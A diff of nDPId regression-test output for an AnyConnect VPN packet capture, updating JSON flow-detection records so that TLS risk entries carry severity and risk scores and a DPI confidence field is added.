 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"}
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
+01482{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7440000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -60,37 +60,37 @@
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"}
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
+01482{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569687246891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"ts_msec":1569687246891,"pkt":"LH6BsEqhNDY7z3UoCABFAAAzrdgAAP8Ra2cKAADjS0tMTPaDADUAH3AoGBgBAAABAAAAAAAABWxvY2FsAAAGAAE="}
-00728{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569687246924,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"ts_msec":1569687246924,"pkt":"NDY7z3UoLH6BsEqhCABFAAB+AABAADYRofVLS0xMCgAA4wA19oMAah4oGBiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAAAyoAQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjpQAAABwgAAAOEAAk6gAABUYA="}
-00737{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00545{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569687246924,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569687246924,"pkt":"LH6BsEqhNDY7z3UoCABFAAA4dQYAAEABY0UKAADjS0tMTAMDBdoAAAAARQAAfgAAQAA2EaH1S0tMTAoAAOMANfaDAGoAAA=="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.305435}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.305435}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569687246981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1569687246981,"pkt":"AQBeAAD7GIEORo7ICABFAACMDQUAAP8RwosKAADV4AAA+xTpFOkAeGDHAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmjqBDkaOyBiBDkaOyA=="}
